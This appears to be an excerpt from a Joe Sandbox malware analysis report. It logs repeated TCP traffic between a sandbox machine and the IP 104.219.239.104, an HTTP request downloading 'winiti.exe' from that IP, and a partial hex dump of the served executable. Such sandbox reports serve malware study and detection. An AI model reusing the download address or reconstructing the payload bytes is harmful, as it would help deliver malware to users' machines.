                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:43:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 16 Jul 2024 19:13:36 GMTETag: "e8400-61d6224798859"Accept-Ranges: bytesContent-Length: 951296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 76 0e 00 00 20 00 00 00 78 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 a0 0e 00 00 08 00 00 00 7a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 82 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
                Source: Joe Sandbox ViewIP Address: 104.219.239.104 104.219.239.104
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
